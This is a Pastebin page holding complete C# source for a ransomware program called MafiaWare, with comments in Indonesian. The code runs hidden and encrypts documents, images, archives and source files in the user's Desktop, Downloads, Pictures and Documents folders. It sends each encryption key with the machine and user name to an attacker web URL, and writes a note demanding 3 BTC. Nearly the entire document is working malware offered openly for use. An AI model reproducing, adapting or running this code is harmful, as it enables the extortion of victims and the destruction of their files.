G2A Many GEOs
SHARE
TWEET

MafiaWare Ransomware

cyberking_ Apr 5th, 2016 (edited) 21,274 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2.  *
  3.  * MAFIAWARE
  4.  * Algorithm from HT, with C Sources
  5.  * Encrypt with AES256
  6.  * Coded By Cyberking
  7.  * email : cyberking@outlook.co.id
  8.  * Mafia Blackhat - Indonesian BlackHat - Indonesian Backtrack Team
  9.  * https://stillblackhat.id
  10.  *
  11.  */
  12.  
  13. using System;
  14. using System.Diagnostics;
  15. using System.Collections.Generic;
  16. using System.ComponentModel;
  17. using System.Data;
  18. using System.Drawing;
  19. using System.Linq;
  20. using System.Text;
  21. using System.Threading.Tasks;
  22. using System.Windows.Forms;
  23. using System.Security;
  24. using System.Security.Cryptography;
  25. using System.IO;
  26. using System.Net;
  27. using Microsoft.Win32;
  28. using System.Runtime.InteropServices;
  29. using System.Text.RegularExpressions;
  30. namespace mafiaware {
  31. public partial class Form1 : Form {
  32. //Web untuk Password Unlock nya
  33. string webPass = "https://yourweb.com/cyberking/w00t.php?g0ttrap=";
  34. string namaUser = Environment.UserName;
  35. string namaKompi = System.Environment.MachineName.ToString();
  36. string dirUsr = "C:\\Users\\";
  37. public Form1() {
  38. InitializeComponent();
  39. }
  40. private void Form1_Load(object sender, EventArgs e) {
  41. Opacity = 0;
  42. this.ShowInTaskbar = false;
  43. ngeEnrypt(); //mulai ngencrypt nya pas loading
  44. ngeEnrypt2();
  45. ngeEnrypt3();
  46. ngeEnrypt4();
  47. }
  48. private void Form_Shown(object sender, EventArgs e) {
  49. Visible = false;
  50. Opacity = 100;
  51. }
  52. //Algo encrypt AES256
  53. public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes) {
  54. byte[] encryptedBytes = null;
  55. byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 };
  56. using (MemoryStream ms = new MemoryStream()) {
  57. using (RijndaelManaged AES = new RijndaelManaged()) {
  58. AES.KeySize = 256;
  59. AES.BlockSize = 128;
  60. var key = new Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000);
  61. AES.Key = key.GetBytes(AES.KeySize / 8);
  62. AES.IV = key.GetBytes(AES.BlockSize / 8);
  63. AES.Mode = CipherMode.CBC;
  64. using (var cs = new CryptoStream(ms, AES.CreateEncryptor(), CryptoStreamMode.Write)) {
  65. cs.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length);
  66. cs.Close();
  67. }
  68. encryptedBytes = ms.ToArray();
  69. }
  70. }
  71. return encryptedBytes;
  72. }
  73. //buat randompass encrypt
  74. public string BuatPass(int length) {
  75. const string valid = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=&?&/";
  76. StringBuilder res = new StringBuilder();
  77. Random rnd = new Random();
  78. while (0 < length--){
  79. res.Append(valid[rnd.Next(valid.Length)]);
  80. }
  81. return res.ToString();
  82. }
  83.  //ngirim pass hasil trap ke web
  84. public void ngirimPass(string password){
  85. string g0ttrap = namaKompi + "-" + namaUser + " " + password;
  86. var fullUrl = webPass + g0ttrap;
  87. var conent = new System.Net.WebClient().DownloadString(fullUrl);
  88. }
  89. //ngencrypt file
  90. public void ngencryptFile(string file, string password) {
  91. byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
  92. byte[] passwordBytes = Encoding.UTF8.GetBytes(password);
  93. //ngehash pass dg sha256
  94. passwordBytes = SHA256.Create().ComputeHash(passwordBytes);
  95. byte[] bytesEncrypted = AES_Encrypt(bytesToBeEncrypted, passwordBytes);
  96. File.WriteAllBytes(file, bytesEncrypted);
  97. System.IO.File.Move(file, file+".Locked-Mafiaware"); //ekstensi hasil ngencrypt
  98. }
  99. //ngencrypt folder
  100. public void ngencryptFolder(string location, string password) {
  101. //ekstensi yang mau di encrypt
  102. var validExtensions = new[] {
  103. ".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd", ".zip", ".rar"
  104. };
  105.  
  106. string[] files = Directory.GetFiles(location);
  107. string[] childDirectories = Directory.GetDirectories(location);
  108. for (int i = 0; i < files.Length; i++){
  109. string extension = Path.GetExtension(files[i]);
  110. if (validExtensions.Contains(extension))
  111. {
  112. ngencryptFile(files[i],password);
  113. }
  114. }
  115. for (int i = 0; i < childDirectories.Length; i++){
  116. ngencryptFolder(childDirectories[i],password);
  117. }
  118. }
  119. public void ngeEnrypt() {
  120. string password = BuatPass(15);
  121. string path = "\\Desktop";
  122. string startPath = dirUsr + namaUser + path;
  123. ngirimPass(password);
  124. ngencryptFolder(startPath,password);
  125. pesanReadMe();
  126. password = null;
  127. System.Windows.Forms.Application.Exit();
  128. }
  129. public void ngeEnrypt2() {
  130. string password = BuatPass(15);
  131. string path = "\\Downloads";
  132. string startPath = dirUsr + namaUser + path;
  133. ngirimPass(password);
  134. ngencryptFolder(startPath,password);
  135. password = null;
  136. System.Windows.Forms.Application.Exit();
  137. }
  138. public void ngeEnrypt3() {
  139. string password = BuatPass(15);
  140. string path = "\\Pictures";
  141. string startPath = dirUsr + namaUser + path;
  142. ngirimPass(password);
  143. ngencryptFolder(startPath,password);
  144. password = null;
  145. System.Windows.Forms.Application.Exit();
  146. }
  147. public void ngeEnrypt4() {
  148. string password = BuatPass(15);
  149. string path = "\\Documents";
  150. string startPath = dirUsr + namaUser + path;
  151. ngirimPass(password);
  152. ngencryptFolder(startPath,password);
  153. password = null;
  154. System.Windows.Forms.Application.Exit();
  155. }
  156. public void pesanReadMe() {
  157. string path = "\\Desktop\\READ_ME.txt";
  158. string fullpath = dirUsr + namaUser + path;
  159. string[] lines = { "Cyberking was Encrypt your File with MafiaWare", "Send 3BTC, then Email me and meet me", "my email cyberking@indonesianbacktrack.or.id" };
  160. System.IO.File.WriteAllLines(fullpath, lines);
  161. }
  162. }
  163. }
RAW Paste Data
Ledger Nano X - The secure hardware wallet
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top